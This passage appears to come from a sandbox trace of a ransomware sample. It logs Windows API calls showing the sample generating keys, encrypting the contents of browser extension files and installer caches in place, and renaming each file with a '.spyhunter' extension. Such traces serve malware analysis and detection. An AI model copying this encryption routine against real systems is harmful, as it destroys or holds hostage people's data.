hHeap=0x2c0000) returned 1 [0133.010] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5a8 | out: pbBuffer=0x25cf5a8) returned 1 [0133.010] GetProcessHeap () returned 0x2c0000 [0133.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.010] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5a0*=0x30) returned 1 [0133.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.010] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT") returned 103 [0133.010] StrStrW (lpFirst="CURRENT", lpSrch=".txt") returned 0x0 [0133.010] GetProcessHeap () returned 0x2c0000 [0133.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.010] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf564*=0x10, lpOverlapped=0x0) returned 1 [0133.011] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffff0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.012] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf564*=0x10, lpOverlapped=0x0) returned 1 [0133.012] GetProcessHeap () returned 0x2c0000 [0133.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.012] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.012] WriteFile (in: hFile=0xec, lpBuffer=0x25cf5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x25cf5a4*, lpNumberOfBytesWritten=0x25cf564*=0x4, lpOverlapped=0x0) returned 1 [0133.012] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf564*=0x30, lpOverlapped=0x0) returned 1 [0133.012] CloseHandle (hObject=0xec) returned 1 [0133.012] GetProcessHeap () returned 0x2c0000 [0133.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.012] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.spyhunter") returned 113 [0133.012] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\CURRENT.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\current.spyhunter")) returned 1 [0133.013] GetProcessHeap () returned 0x2c0000 [0133.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.013] GetProcessHeap () returned 0x2c0000 [0133.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.013] GetProcessHeap () returned 0x2c0000 [0133.013] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f29f48 | out: hHeap=0x2c0000) returned 1 [0133.013] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5a8 | out: pbBuffer=0x25cf5a8) returned 1 [0133.013] GetProcessHeap () returned 0x2c0000 [0133.013] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.013] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf5a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf5a0*=0x30) returned 1 [0133.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.014] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log") returned 106 [0133.014] StrStrW (lpFirst="000003.log", lpSrch=".txt") returned 0x0 [0133.014] GetProcessHeap () returned 0x2c0000 [0133.014] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.014] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf564*=0x156, lpOverlapped=0x0) returned 1 [0133.015] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffeaa, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.015] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x156, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf564*=0x156, lpOverlapped=0x0) returned 1 [0133.015] GetProcessHeap () returned 0x2c0000 [0133.015] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.015] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.015] WriteFile (in: hFile=0xec, lpBuffer=0x25cf5a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x25cf5a4*, lpNumberOfBytesWritten=0x25cf564*=0x4, lpOverlapped=0x0) returned 1 [0133.016] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf564, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf564*=0x30, lpOverlapped=0x0) returned 1 [0133.016] CloseHandle (hObject=0xec) returned 1 [0133.016] GetProcessHeap () returned 0x2c0000 [0133.016] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.016] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.spyhunter") returned 116 [0133.016] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Rules\\000003.log.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extension rules\\000003.log.spyhunter")) returned 1 [0133.017] GetProcessHeap () returned 0x2c0000 [0133.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.017] GetProcessHeap () returned 0x2c0000 [0133.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.017] GetProcessHeap () returned 0x2c0000 [0133.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4aa10 | out: hHeap=0x2c0000) returned 1 [0133.017] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf5a0 | out: pbBuffer=0x25cf5a0) returned 1 [0133.017] GetProcessHeap () returned 0x2c0000 [0133.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.017] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf598*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf598*=0x30) returned 1 [0133.017] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.018] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm") returned 81 [0133.018] StrStrW (lpFirst="state.rsm", lpSrch=".txt") returned 0x0 [0133.018] GetProcessHeap () returned 0x2c0000 [0133.018] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0133.018] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf55c*=0x2fe, lpOverlapped=0x0) returned 1 [0133.019] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xfffffd02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.020] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2fe, lpNumberOfBytesWritten=0x25cf55c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf55c*=0x2fe, lpOverlapped=0x0) returned 1 [0133.028] GetProcessHeap () returned 0x2c0000 [0133.028] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0133.028] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.028] WriteFile (in: hFile=0xec, lpBuffer=0x25cf59c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf55c, lpOverlapped=0x0 | out: lpBuffer=0x25cf59c*, lpNumberOfBytesWritten=0x25cf55c*=0x4, lpOverlapped=0x0) returned 1 [0133.028] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf55c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf55c*=0x30, lpOverlapped=0x0) returned 1 [0133.028] CloseHandle (hObject=0xec) returned 1 [0133.028] GetProcessHeap () returned 0x2c0000 [0133.028] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0133.028] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.spyhunter") returned 91 [0133.028] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.spyhunter" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.spyhunter")) returned 1 [0133.029] GetProcessHeap () returned 0x2c0000 [0133.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0133.029] GetProcessHeap () returned 0x2c0000 [0133.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.029] GetProcessHeap () returned 0x2c0000 [0133.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d198 | out: hHeap=0x2c0000) returned 1 [0133.362] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf598 | out: pbBuffer=0x25cf598) returned 1 [0133.362] GetProcessHeap () returned 0x2c0000 [0133.362] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.362] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf590*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf590*=0x30) returned 1 [0133.362] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0133.363] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe") returned 89 [0133.363] StrStrW (lpFirst="VC_redist.x64.exe", lpSrch=".txt") returned 0x0 [0133.363] GetProcessHeap () returned 0x2c0000 [0133.363] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.363] ReadFile (in: hFile=0xec, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf554*=0x2800, lpOverlapped=0x0) returned 1 [0133.526] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.526] WriteFile (in: hFile=0xec, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf554, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf554*=0x2800, lpOverlapped=0x0) returned 1 [0133.526] GetProcessHeap () returned 0x2c0000 [0133.526] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.526] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.526] WriteFile (in: hFile=0xec, lpBuffer=0x25cf594*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf554, lpOverlapped=0x0 | out: lpBuffer=0x25cf594*, lpNumberOfBytesWritten=0x25cf554*=0x4, lpOverlapped=0x0) returned 1 [0133.722] WriteFile (in: hFile=0xec, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf554, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf554*=0x30, lpOverlapped=0x0) returned 1 [0133.722] CloseHandle (hObject=0xec) returned 1 [0133.801] GetProcessHeap () returned 0x2c0000 [0133.801] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.801] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.spyhunter") returned 99 [0133.801] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), lpNewFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.spyhunter" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.spyhunter")) returned 1 [0133.802] GetProcessHeap () returned 0x2c0000 [0133.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.802] GetProcessHeap () returned 0x2c0000 [0133.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.802] GetProcessHeap () returned 0x2c0000 [0133.802] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44b28 | out: hHeap=0x2c0000) returned 1 [0133.803] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf590 | out: pbBuffer=0x25cf590) returned 1 [0133.803] GetProcessHeap () returned 0x2c0000 [0133.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.804] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf588*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf588*=0x30) returned 1 [0133.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.804] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json") returned 155 [0133.804] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.804] GetProcessHeap () returned 0x2c0000 [0133.804] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.804] ReadFile (in: hFile=0x188, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf54c*=0x110, lpOverlapped=0x0) returned 1 [0133.805] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffef0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.805] WriteFile (in: hFile=0x188, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x25cf54c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf54c*=0x110, lpOverlapped=0x0) returned 1 [0133.805] GetProcessHeap () returned 0x2c0000 [0133.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.805] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.805] WriteFile (in: hFile=0x188, lpBuffer=0x25cf58c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf54c, lpOverlapped=0x0 | out: lpBuffer=0x25cf58c*, lpNumberOfBytesWritten=0x25cf54c*=0x4, lpOverlapped=0x0) returned 1 [0133.806] WriteFile (in: hFile=0x188, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf54c, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf54c*=0x30, lpOverlapped=0x0) returned 1 [0133.806] CloseHandle (hObject=0x188) returned 1 [0133.806] GetProcessHeap () returned 0x2c0000 [0133.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.806] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.spyhunter") returned 165 [0133.806] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\bg\\messages.json.spyhunter")) returned 1 [0133.807] GetProcessHeap () returned 0x2c0000 [0133.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0133.807] GetProcessHeap () returned 0x2c0000 [0133.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0133.807] GetProcessHeap () returned 0x2c0000 [0133.807] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31e2d8 | out: hHeap=0x2c0000) returned 1 [0133.808] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf588 | out: pbBuffer=0x25cf588) returned 1 [0133.808] GetProcessHeap () returned 0x2c0000 [0133.808] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0133.808] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf580*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf580*=0x30) returned 1 [0133.808] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0133.808] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json") returned 155 [0133.808] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0133.809] GetProcessHeap () returned 0x2c0000 [0133.809] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0133.809] ReadFile (in: hFile=0x188, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x25cf544*=0x101, lpOverlapped=0x0) returned 1 [0133.810] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xfffffeff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0133.810] WriteFile (in: hFile=0x188, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x101, lpNumberOfBytesWritten=0x25cf544, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x25cf544*=0x101, lpOverlapped=0x0) returned 1 [0133.810] GetProcessHeap () returned 0x2c0000 [0133.810] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0133.810] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0133.810] WriteFile (in: hFile=0x188, lpBuffer=0x25cf584*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf544, lpOverlapped=0x0 | out: lpBuffer=0x25cf584*, lpNumberOfBytesWritten=0x25cf544*=0x4, lpOverlapped=0x0) returned 1 [0133.810] WriteFile (in: hFile=0x188, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf544, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf544*=0x30, lpOverlapped=0x0) returned 1 [0133.810] CloseHandle (hObject=0x188) returned 1 [0133.810] GetProcessHeap () returned 0x2c0000 [0133.810] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0133.810] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json.spyhunter") returned 165 [0133.811] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 